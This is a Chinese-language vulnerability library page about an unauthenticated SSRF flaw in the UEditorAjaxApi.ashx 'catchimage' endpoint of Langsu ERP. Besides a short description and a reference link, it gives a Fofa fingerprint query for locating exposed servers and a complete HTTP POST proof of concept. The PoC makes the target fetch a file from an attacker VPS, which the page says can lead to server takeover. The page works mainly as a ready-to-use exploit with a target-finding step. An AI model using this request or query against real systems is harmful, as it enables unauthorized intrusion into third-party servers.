A_内功A_POC探索IIS

Source

Edit

History

【郎速ERP】UEditorAjaxApi.aspx接口存在SSRF漏洞

文章目录

1. 漏洞说明
2. Fofa
3. POC

概述

朗速ERP UEditorAjaxApi.ashx 接口存在SSRF漏洞,未经身份验证的远程攻击者可以利用该漏洞在VPS上构造恶意文件，使服务器访问并下载文件到本地，进而控制服务器权限。

相关参考

Notes/Security/Book/漏洞文库/Github某个被删的漏洞库的备份/朗速ERP/朗速ERP系统接口UEditorAjaxApi.ashx存在SSRF漏洞.md at 3c83ec8d096b1a03e11155801d6fa42630cf551f · jsktpbluek-beep/Notes

![forthebadge](data:image/svg+xml;base64,PHN2ZyBkYXRhLXYtM2M4N2I3YjQ9IiIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB3aWR0aD0iMjUzLjYyNSIgaGVpZ2h0PSIzNSIgdmlld0JveD0iMCAwIDI1My42MjUgMzUiIGNsYXNzPSJiYWRnZS1zdmciPjxkZWZzIGRhdGEtdi0zYzg3YjdiND0iIj48IS0tLS0+PCEtLS0tPjwhLS0tLT48L2RlZnM+PHJlY3QgZGF0YS12LTNjODdiN2I0PSIiIHdpZHRoPSI4OC41NjI1IiBoZWlnaHQ9IjM1IiBmaWxsPSIjMWExYTFhIi8+PHJlY3QgZGF0YS12LTNjODdiN2I0PSIiIHg9Ijg4LjU2MjUiIHdpZHRoPSI1MC4zMTI1IiBoZWlnaHQ9IjM1IiBmaWxsPSIjZmY2YjM1Ii8+PCEtLS0tPjx0ZXh0IGRhdGEtdi0zYzg3YjdiND0iIiB4PSI0NC4yODEyNSIgeT0iMTcuNSIgZHk9IjAuMzVlbSIgZm9udC1zaXplPSIxMiIgZm9udC1mYW1pbHk9IlJvYm90bywgc2Fucy1zZXJpZiIgZmlsbD0iIzAwZmYwMCIgdGV4dC1hbmNob3I9Im1pZGRsZSIgbGV0dGVyLXNwYWNpbmc9IjIiIGZvbnQtd2VpZ2h0PSI2MDAiIGZvbnQtc3R5bGU9Im5vcm1hbCIgdGV4dC1kZWNvcmF0aW9uPSJub25lIiBmaWxsLW9wYWNpdHk9IjEiIGZvbnQtdmFyaWFudD0ibm9ybWFsIiBzdHlsZT0idGV4dC10cmFuc2Zvcm06IHVwcGVyY2FzZTsiPkxVTVNPRlQ8L3RleHQ+PCEtLS0tPjx0ZXh0IGRhdGEtdi0zYzg3YjdiND0iIiB4PSIxMTMuNzE4NzUiIHk9IjE3LjUiIGR5PSIwLjM1ZW0iIGZvbnQtc2l6ZT0iMTIiIGZvbnQtZmFtaWx5PSJNb250c2VycmF0LCBzYW5zLXNlcmlmIiBmaWxsPSIjZmZmZmZmIiB0ZXh0LWFuY2hvcj0ibWlkZGxlIiBmb250LXdlaWdodD0iOTAwIiBsZXR0ZXItc3BhY2luZz0iMiIgZm9udC1zdHlsZT0ibm9ybWFsIiB0ZXh0LWRlY29yYXRpb249Im5vbmUiIGZpbGwtb3BhY2l0eT0iMSIgZm9udC12YXJpYW50PSJub3JtYWwiIHN0eWxlPSJ0ZXh0LXRyYW5zZm9ybTogdXBwZXJjYXNlOyI+RVJQPC90ZXh0PjxyZWN0IGRhdGEtdi0zYzg3YjdiND0iIiB4PSIxMzguODc1IiB3aWR0aD0iMTE0Ljc1IiBoZWlnaHQ9IjM1IiBmaWxsPSIjZDMyZjJmIi8+PCEtLS0tPjx0ZXh0IGRhdGEtdi0zYzg3YjdiND0iIiB4PSIxOTYuMjUiIHk9IjE3LjUiIGR5PSIwLjM1ZW0iIGZvbnQtc2l6ZT0iMTIiIGZvbnQtZmFtaWx5PSJSb2JvdG8sIHNhbnMtc2VyaWYiIGZpbGw9IiNmZmZmZmYiIHRleHQtYW5jaG9yPSJtaWRkbGUiIGZvbnQtd2VpZ2h0PSI1MDAiIGxldHRlci1zcGFjaW5nPSIyIiBmb250LXN0eWxlPSJub3JtYWwiIHRleHQtZGVjb3JhdGlvbj0ibm9uZSIgZmlsbC1vcGFjaXR5PSIxIiBmb250LXZhcmlhbnQ9Im5vcm1hbCIgc3R5bGU9InRleHQtdHJhbnNmb3JtOiB1cHBlcmNhc2U7Ij5WVUxORVJBQkxFPC90ZXh0Pjwvc3ZnPg==)

漏洞说明

郎速ERP的SSRF漏洞，涉及组件 Ajax

Fofa

1	body="/Resource/Scripts/Yw/Yw_Bootstrap.js"

POC

POST /Api/UEditor/UEditorAjaxApi.ashx?method=catchimage HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Connection: keep-alive

source[]=http://vpsip